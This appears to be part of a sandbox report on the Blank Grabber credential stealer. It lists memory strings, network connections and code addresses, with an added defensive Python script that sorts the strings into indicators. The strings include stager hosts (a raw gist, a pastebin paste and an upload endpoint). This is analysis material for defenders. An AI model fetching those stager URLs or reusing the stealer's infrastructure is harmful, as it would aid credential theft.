                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://peps.python.org/pep-0263/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409064610.000001DCB5E95000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E57000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                Source: bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nodejs.org
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474254395.00007FF8E6C8A000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.dr | String found in binary or memory: https://www.openssl.org/H
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.python.org/psf/license/)
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc825
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
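                Most of the URL strings above are not indicators at all: a PyInstaller-packed Python stealer drags in the documentation links baked into requests, urllib3, importlib_metadata and the CPython stdlib, and only a handful of rows (the raw gist and pastebin URLs, the Node.js installer, the unknown upload host carried by bound.exe) are worth pivoting on. The following is an added triage script, not part of the Joe Sandbox report or of Blank Grabber; the row layout it parses is the flattened "Source ... String found in binary or memory ..." form shown above, the sample rows are constructed copies in that shape, and the host lists and category names are this example's own assumptions. It also handles the first row's artefact, where two strings were glued together at a memory page boundary ("...rawChttps://pastebin.c").

```python
"""Triage 'String found in binary or memory' rows from a sandbox report.

Added example for this report; not Joe Sandbox or Blank Grabber code. The
row layout, the host lists and the category names are assumptions of this
example, chosen to separate bundled-library noise from strings an analyst
would actually pivot on.
"""
import re
from urllib.parse import urlsplit

# Constructed sample rows in the shape of the report (sample names shortened).
# Extraction often drops the tab between the source column and the detail
# column, so the parser accepts both forms. Row 1 carries two strings glued
# together, as in the report's first row.
SAMPLE_ROWS = """\
Source: sample.exe, 00000002.00000003.1413757581.000001DCB6D3F000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
Source: sample.exe, 00000002.00000002.1460493286.000001DCB5B30000.sdmp\tString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: sample.exe, 00000002.00000002.1462623142.000001DCB6380000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
Source: bound.exe, 00000011.00000002.1605507236.00000254B6C19000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: sample.exe, 00000002.00000002.1460493286.000001DCB5B30000.sdmpString found in binary or memory: https://gstatic.com/generate_204
Source: sample.exe, 00000002.00000002.1459866159.000001DCB586F000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
"""

ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*String found in binary or memory:\s*(?P<detail>\S+)\s*$"
)
# Splits strings that were concatenated with no separator ("...rawChttps://...").
URL_RE = re.compile(r"https?://.*?(?=https?://|$)")

# Assumed noise lists: hosts that appear only because a bundled library embeds them.
LIBRARY_DOC_HOSTS = {
    "packaging.python.org", "peps.python.org", "www.python.org",
    "urllib3.readthedocs.io", "tools.ietf.org", "www.rfc-editor.org", "json.org",
    "html.spec.whatwg.org", "www.newtonsoft.com", "www.openssl.org",
    "sectigo.com", "nuget.org", "www.nuget.org",
}
LIBRARY_GITHUB_ORGS = {"python", "urllib3", "Pester", "Unidata", "tensorflow"}
# Reachability probes used by requests/urllib3 test code and by the grabber itself.
CONNECTIVITY_HOSTS = {"gstatic.com", "google.com", "httpbin.org", "twitter.com", "yahoo.com"}
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com"}


def classify_url(url: str) -> str:
    """Assign one assumed category to a URL string; 'review' means unknown host."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path
    first_seg = path.strip("/").split("/")[0] if path.strip("/") else ""
    if host in GITHUB_HOSTS and path.startswith("/Blank-c/"):
        return "attribution"          # the family's own repository, not infrastructure
    if host == "gist.githubusercontent.com" or (host == "pastebin.com" and path.startswith("/raw/")):
        return "stager"               # raw paste/gist: classic config or next-stage fetch
    if path.lower().endswith((".msi", ".exe", ".zip", ".dll")):
        return "download"             # second-stage installer/binary
    if host in CONNECTIVITY_HOSTS:
        return "connectivity-check"
    if host in LIBRARY_DOC_HOSTS or (host == "github.com" and first_seg in LIBRARY_GITHUB_ORGS):
        return "library-docs"
    return "review"


def parse_rows(text: str) -> list:
    """Return one finding per URL: {'url', 'category', 'procs'}."""
    findings = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        # Source column alternates process/file name and memory-region id; keep the names.
        procs = sorted({tok for tok in m.group("src").split(", ") if not tok.endswith(".sdmp")})
        for url in URL_RE.findall(m.group("detail")):
            findings.append({"url": url, "category": classify_url(url), "procs": procs})
    return findings


def pivot_urls(findings: list) -> list:
    """URLs an analyst should chase: stagers, downloads and anything unclassified."""
    wanted = {"stager", "download", "review"}
    return sorted({f["url"] for f in findings if f["category"] in wanted})


if __name__ == "__main__":
    for f in parse_rows(SAMPLE_ROWS):
        print(f"{f['category']:<18} {', '.join(f['procs']):<22} {f['url']}")
    print("\npivot on:", *pivot_urls(parse_rows(SAMPLE_ROWS)), sep="\n  ")
```

                The glued first row yields a truncated fragment (https://pastebin.c) that lands in "review" rather than being silently dropped or mis-matched to pastebin.com; when a string looks cut off like that, read the adjacent rows of the report (here the separate pastebin.com/raw row from bound.exe) before treating the fragment as a distinct indicator.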
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknown | HTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49767 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49785 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.9:49792 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.9:49809 version: TLS 1.2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD089E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD26964
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD01000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD25C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD23C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD12C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD11B50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD0ACAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD0A474
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD26418
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD139A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD12164
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD11944
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD0A2DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD1DA5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD09800
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD18794
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD11F60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD11740
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD29728
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD180E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD240AC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD135A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD1E570
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD11D54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD15D30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD1DEF0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD19EA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD25E7C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD26964
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD01000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD25C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD23C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD12C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD11B50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD0ACAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD0A474
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD26418
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD089E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD139A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD12164
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD11944
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD0A2DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD1DA5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD09800
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD18794
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD11F60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD11740
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD29728
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD180E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD240AC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD135A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD1E570
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD11D54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD15D30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD1DEF0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD19EA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF7EAD25E7C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E6C89060
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E75333C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A10350
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7961300
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7962270
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7961950
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A98870
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A28720
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A2116D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A216FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A21D93
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A22702
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A2117C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A21B54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E7A2149C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21CBC2_2_00007FF8E7A21CBC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A9AC802_2_00007FF8E7A9AC80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21A0F2_2_00007FF8E7A21A0F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A226172_2_00007FF8E7A22617
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A216182_2_00007FF8E7A21618
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A589202_2_00007FF8E7A58920
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21EE22_2_00007FF8E7A21EE2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A216542_2_00007FF8E7A21654
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A213DE2_2_00007FF8E7A213DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A221C62_2_00007FF8E7A221C6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A936502_2_00007FF8E7A93650
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21C122_2_00007FF8E7A21C12
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A217F82_2_00007FF8E7A217F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A8D2D02_2_00007FF8E7A8D2D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A224DC2_2_00007FF8E7A224DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A460302_2_00007FF8E7A46030
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21AD72_2_00007FF8E7A21AD7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A215462_2_00007FF8E7A21546
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A6DE502_2_00007FF8E7A6DE50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A221E42_2_00007FF8E7A221E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21FDC2_2_00007FF8E7A21FDC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A65C002_2_00007FF8E7A65C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2155A2_2_00007FF8E7A2155A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A4BAE02_2_00007FF8E7A4BAE0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7AE7A202_2_00007FF8E7AE7A20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A69A602_2_00007FF8E7A69A60
